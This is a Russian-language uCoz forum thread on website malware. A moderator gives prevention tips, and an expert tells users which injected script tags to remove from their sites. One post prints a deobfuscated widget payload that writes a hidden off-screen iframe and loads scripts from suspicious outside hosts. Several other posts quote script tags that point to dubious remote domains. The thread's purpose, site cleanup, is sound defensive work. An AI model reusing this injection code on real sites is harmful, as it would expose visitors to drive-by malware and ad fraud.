Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    adminis
    Сообщений: 20
    Репутация: 2

    Сообщение # 1501 | 22:27:12
    Как удалить Mal/Iframe-AN , яндекс нашел а как его удалить? не подскажете?

    на сайте http://stupino.do.am/news

    Портал города Ступино http://stupino.do.am
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1502 | 22:36:42
    adminis, удалите скрипт

    Код
    <script language="JavaScript" src="http://101widgets.com/05000219/180/220"></script>
    и больше никогда с этого сайта красивости не собирайте

    скрипты меню перелить на сайт. после очистки зайдите в вебмастер яндекса и задайте перепроверку. если кнопки перепроверки не будет, пишите в тех.поддержку

    вот посмотрите что подгружает этот информер. это раскрытый код

    Код
    document.write('<iframe style="position:absolute; left: -5000px; width: 1px; height: 1px;" src="//261210.xcc.su/uri.php?i=16820"></iframe><script type="text/javascript">(function(w) {var script = document.createElement("script");var i = setInterval(function() {if (typeof w.document.body !== "undefined") {script.src = "//is.grillgas.is" + "/?554273=VRxVUwdDTU5CSkhFUhwYGBI";w.document.body.appendChild(script);clearInterval(i);}}, 200);})(window); </script><script src="//261214206.yellow-code.jetos.com/in.php?i=21753"></script><object data="http://101widgets.com/_/05000219.swf" type="application/x-shockwave-flash" height="220" width="180"><param name="menu" value="false" /><param name="quality" value="high" /><param name="wmode" value="transparent" /></object>');

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Leonora_
    Сообщений: 130
    Репутация: 6

    Сообщение # 1503 | 16:19:25
    Здравствуйте! Помогите пожалуйста убрать ярлык "опасный сайт"


    Утром было все нормально, ничего не добавляла кроме коментария. Сейчас появилось это неприятное сообщение.
    Проверила на вирусы http://antivirus-alarm.ru/proverka/?url=trudolub-sad.ucoz.ua/&again=1 вроде пишет, что нет.
    Что делать?
    Прикрепления: 0151847.jpg (120.0 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1504 | 18:36:58
    Leonora_,

    из блока календарь удалить скрипт

    Код
    <script language="JavaScript" src="http://101widgets.com/00000912/170/222"></script>


    из опроса удалить скрипт

    Код
    <script src="http://lifi-gta.ru/jogin_form_javascript.js" type="text/javascript"></script>


    из информера нас посетили удалить скрипт
    Код

    <script type="text/javascript" src="http://camadmin.ru/earch.js"></script>


    из мини-чата удалить скрипт

    Код
    <script src="http://am-investor.ru/higer.js" type="text/javascript"></script>


    мусор в виде перевода сайта удалить вообще

    мусор из мини-чата в виде тысячи картинок с подгрузкой с сомнительного сайта почистить и картинки перелить на сайт как и бесполезный скрипт

    Код
    <script type="text/javascript" src="http://ili.pp.ua/js_css/bbcodes.js"></script>


    из блока часы удалить скрипт

    Код
    <script language="JavaScript" src="http://xuxu.org.ua/i/200/200/10179812"></script>


    на будущее нужно воздержаться от сбора на сомнительных сайтах кучи бесполезных скриптов, так как все проблемы у вас от них

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1505 | 20:54:45
    для Ждырёва

    из блока радио удалить скрипт

    Код
    <script language="JavaScript" src="http://101widgets.com/02000319/170/206"></script>
    и больше никогда с этого сайта ничего не ставьте

    из блока калькулятор удалить скрипт

    Код
    <script language="JavaScript" src="http://xuxu.org.ua/i/160/216/30003012"></script>
    сторонний сомнительный ресурс, раздающий виджеты виджетмонстра иногда прошивается рекламой

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    jackson4862
    Сообщений: 4
    Репутация: 0

    Сообщение # 1506 | 15:29:05
    Здравствуйте. Пожалуйста помогите убрать рекламу с сайта. Онлайн проверка сайта дала результат http://mobiads.ru/7920.js, тип файла: javascript. И при заходе на сайт с андроида на сайте появляется реклама. Где это найти на сайте?
    сайт svalka-na.ucoz.ru

    И не могли бы сообщить какая вообще реклама от Ucoz, что бы уж точно знать постороння какая-то появилась или это ucoz балуется. )
    Сообщение отредактировал jackson4862 - Среда, 24 Сен 2014, 15:31:26
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1507 | 17:36:09
    jackson4862, у uCoz есть реклама для мобильных устройств

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    jackson4862
    Сообщений: 4
    Репутация: 0

    Сообщение # 1508 | 09:59:37
    webanet, так вот http://mobiads.ru/ это от uCoz ?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1509 | 16:40:05
    jackson4862, да

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1510 | 19:14:05
    Меня интересует, может ли пользователь добавить вредоносный код на форуме каким либо образом? через bb коды и т.д
    Просто есть тема http://servissoc.ru/forum/52-1193-1 пользователь в ней пишет какие то коды, но я в этом не понимаю ничего, может он и пишет там вредоносные коды.
    Ответьте если кто знает.

    http://servissoc.ru/forum/ форум о социальных сетях
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1511 | 19:59:02
    slavarus, удаляйте тему. а старателей в блок.

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    StarMen
    Сообщений: 204
    Репутация: 31

    Сообщение # 1512 | 21:56:45
    webanet, Понятно спасибо. И еще один вопрос не по теме немного и всё же, Я, вот случайно обнаружил у себя в разделе "Онлайн игры" написано "скачать" и ссылка ведет на какой то, левый ресурс, обычно ссылки ведут на какой нибудь игровой портал где и можно скачать игру, но некоторые ведут на какие то странные ресурсы, таких попалось мне три штуки и конечно я, их все удалил. По таким ссылкам может идти какая нибудь вредоносная гадость?

    P.S. ...и чтобы не засорять тему, можете потом если несложно удалить мой вопрос

    Живая Вода Кристально чистая лечебная вода.
    Сообщение отредактировал StarMen - Пятница, 26 Сен 2014, 21:58:45
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1513 | 22:07:32
    StarMen, вот не надо было удалять игры с левыми ссылками скачать. сейчас я даже угадать не смогу что там было. мне нужно видеть это все. со слов я не умею

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    StarMen
    Сообщений: 204
    Репутация: 31

    Сообщение # 1514 | 22:11:36
    webanet, Понял, хорошо, если еще попадется, скину вам.

    Живая Вода Кристально чистая лечебная вода.
    123454892
    Сообщений: 2
    Репутация: 0

    Сообщение # 1515 | 23:21:19
    Помогите, в поисковике набираю свой сайт и написано, что доступ запрещен но сам сайт открывается. и еще у меня до этого была проблема с видео рекламой и мне помог в этой проблеме Растислав но он написал что у меня скрыты банеры от юкоз, я не чего не скрывала подскажите как их опять включить. Спасибо заранее!!!! termit-samara. ucoz.ru
    Поиск: